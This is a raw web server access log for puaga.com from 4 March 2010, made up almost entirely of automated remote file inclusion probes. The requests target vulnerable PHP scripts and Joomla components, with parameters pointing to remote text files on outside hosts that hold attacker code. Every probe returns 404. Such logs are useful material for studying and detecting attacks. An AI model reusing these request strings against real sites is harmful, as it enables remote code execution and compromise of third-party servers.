118.168.13.113 - - [04/Mar/2010:05:34:17 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:34:18 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.243.45.247 - - [04/Mar/2010:05:34:32 -0800] "GET /logs/access_100207.log//admin/auth.php?xcart_dir=http://kzblog.iswift.eu/forum//combro/header.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [04/Mar/2010:05:34:44 -0800] "GET /logs/access_100219.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:05:34:51 -0800] "GET /logs/access_100217.log%20%20//htmltonuke.php?filnavn=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:05:34:51 -0800] "GET /logs//htmltonuke.php?filnavn=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:05:34:51 -0800] "GET /htmltonuke.php?filnavn=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:05:35:00 -0800] "GET /logs/access_100215.log%20%20//htmltonuke.php?filnavn=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:05:35:21 -0800] "GET /logs//htmltonuke.php?filnavn=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:05:35:21 -0800] "GET /logs/access_100217.log%20%20//htmltonuke.php?filnavn=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:05:35:21 -0800] "GET /htmltonuke.php?filnavn=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.237.78.176 - - [04/Mar/2010:05:35:21 -0800] "GET /logs/access_100215.log%20%20//htmltonuke.php?filnavn=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.158.231.168 - - [04/Mar/2010:05:36:05 -0800] "GET //vwar/backup/errors.php?error=http://cealianca.org.br/administrator/components/a??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
202.158.231.168 - - [04/Mar/2010:05:36:05 -0800] "GET /logs///vwar/backup/errors.php?error=http://cealianca.org.br/administrator/components/a??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:36:12 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:36:12 -0800] "GET /logs/access_100215.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:36:12 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:36:13 -0800] "GET /logs/access_100215.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:36:13 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:36:13 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:36:25 -0800] "GET /logs/access_100129.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:36:25 -0800] "GET /logs/access_100129.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [04/Mar/2010:05:37:13 -0800] "GET /logs/access_100126.log%20%20/phphtml.php?htmlclass_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.162.116.235 - - [04/Mar/2010:05:38:36 -0800] "GET /logs/access_100201.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [04/Mar/2010:05:39:30 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [04/Mar/2010:05:39:39 -0800] "GET /logs/access_100219.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:39:46 -0800] "GET /logs/access_100215.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:39:46 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:39:46 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:39:47 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:39:47 -0800] "GET /logs/access_100215.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:39:47 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:39:55 -0800] "GET /logs/access_100129.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:39:56 -0800] "GET /logs/access_100129.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [04/Mar/2010:05:41:32 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [04/Mar/2010:05:41:39 -0800] "GET /logs/access_100219.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:42:20 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:42:20 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:42:20 -0800] "GET /logs/access_100215.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:42:33 -0800] "GET /logs/access_100129.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:05:42:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:05:42:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.170.49 - - [04/Mar/2010:05:42:41 -0800] "GET /logs/access_100130.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.lovebyday.com/components/Oid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:43:14 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.145.92.17 - - [04/Mar/2010:05:43:14 -0800] "GET /logs/access_100129.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://vickyfornah.com/home/templates/js_jamba/log/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.37.58.222 - - [04/Mar/2010:05:44:31 -0800] "GET /logs/access.log//port.php?content=http://www.rockmanpm.com/i/x/zzz/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:05:44:46 -0800] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:05:44:46 -0800] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:05:44:46 -0800] "GET /logs/access_100217.log%20%20//joomla/components/com_extcalendar/admin_events.php=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [04/Mar/2010:05:44:49 -0800] "GET /logs/access_100218.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.47 - - [04/Mar/2010:05:44:59 -0800] "GET /logs/access_100219.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [04/Mar/2010:05:45:18 -0800] "GET /polteaser/ HTTP/1.1" 200 1569 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
67.195.37.97 - - [04/Mar/2010:05:46:07 -0800] "GET /ideal/?N=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
116.127.121.117 - - [04/Mar/2010:05:47:04 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:47:04 -0800] "GET /logs/access_100129.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:47:06 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:47:06 -0800] "GET /logs/access_100129.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:05:47:26 -0800] "GET /logs//joomla/components/com_extcalendar/admin_events.php=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:05:47:26 -0800] "GET /logs/access_100217.log//joomla/components/com_extcalendar/admin_events.php=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:05:47:26 -0800] "GET /logs/access_100218.log//joomla/components/com_extcalendar/admin_events.php=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:05:47:26 -0800] "GET /joomla/components/com_extcalendar/admin_events.php=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.126.35.98 - - [04/Mar/2010:05:47:37 -0800] "GET /logs/access_100214.log%20%20//bbs/write_update.php?board_skin_path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.86.52.250 - - [04/Mar/2010:05:47:51 -0800] "GET /logs/access_100203.log//joomla/components/com_extcalendar/admin_events.php=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:05:48:03 -0800] "GET /logs/%030/domit/xml_domit_rss.php?mosConfig_absolute_path=http://bidakara.ac.id/ikhwan/foto_berita/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:05:48:04 -0800] "GET /logs/access_100212.log/%030/domit/xml_domit_rss.php?mosConfig_absolute_path=http://bidakara.ac.id/ikhwan/foto_berita/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:48:10 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
112.76.72.3 - - [04/Mar/2010:05:48:14 -0800] "GET /logs/access_100129.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:49:49 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:49:49 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:49:50 -0800] "GET /logs/access_100214.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:49:50 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:50:56 -0800] "GET /logs/access_100214.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:50:57 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:51:06 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:05:51:44 -0800] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:05:51:44 -0800] "GET /logs/access_100129.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
71.6.165.149 - - [04/Mar/2010:05:51:44 -0800] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.solimantravel.com//micro_cms_files/images/panglima/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
95.110.224.127 - - [04/Mar/2010:05:52:23 -0800] "GET /logs///errors.php?error=http://www.lpm.mgroup.pl/modules/xoopsgallery/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:52:33 -0800] "GET /logs/access_100126.log%20%20//guestbook1//admin.php?include_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:52:33 -0800] "GET /guestbook1//admin.php?include_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:52:33 -0800] "GET /logs//guestbook1//admin.php?include_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:52:39 -0800] "GET /logs/access_100217.log%20%20//guestbook1//admin.php?include_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:52:47 -0800] "GET /guestbook1//admin.php?include_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:52:47 -0800] "GET /logs//guestbook1//admin.php?include_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:52:47 -0800] "GET /logs/access_100126.log%20%20//guestbook1//admin.php?include_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [04/Mar/2010:05:52:53 -0800] "GET /logs/access_100217.log%20%20//guestbook1//admin.php?include_path=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:05:53:16 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:05:53:16 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [04/Mar/2010:05:53:17 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.karavi.net/components/com_banners/banner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:05:53:20 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:05:53:20 -0800] "GET /logs/access_100225.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:05:53:20 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:05:53:29 -0800] "GET /theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:05:53:29 -0800] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.65.116 - - [04/Mar/2010:05:53:29 -0800] "GET /logs/access_100225.log%20%20//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:53:51 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:53:54 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:05:53:57 -0800] "GET /logs/access_100212.log/%030/domit/xml_domit_rss.php?mosConfig_absolute_path=http://bidakara.ac.id/ikhwan/foto_berita/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:05:53:57 -0800] "GET /%030/domit/xml_domit_rss.php?mosConfig_absolute_path=http://bidakara.ac.id/ikhwan/foto_berita/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [04/Mar/2010:05:53:57 -0800] "GET /logs/%030/domit/xml_domit_rss.php?mosConfig_absolute_path=http://bidakara.ac.id/ikhwan/foto_berita/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [04/Mar/2010:05:54:04 -0800] "GET /logs/access_100218.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:13 -0800] "GET /logs//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:13 -0800] "GET /admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:13 -0800] "GET /logs/access_100219.log%20%20//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:13 -0800] "GET /logs/access_100209.log%20%20//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:16 -0800] "GET /admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:16 -0800] "GET /logs//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:16 -0800] "GET /logs/access_100219.log%20%20//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:16 -0800] "GET /logs/access_100209.log%20%20//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:34 -0800] "GET /logs/access_100219.log//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:34 -0800] "GET /logs//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:34 -0800] "GET /admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [04/Mar/2010:05:54:35 -0800] "GET /logs/access_100209.log//admin/classes/errors.php?error=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
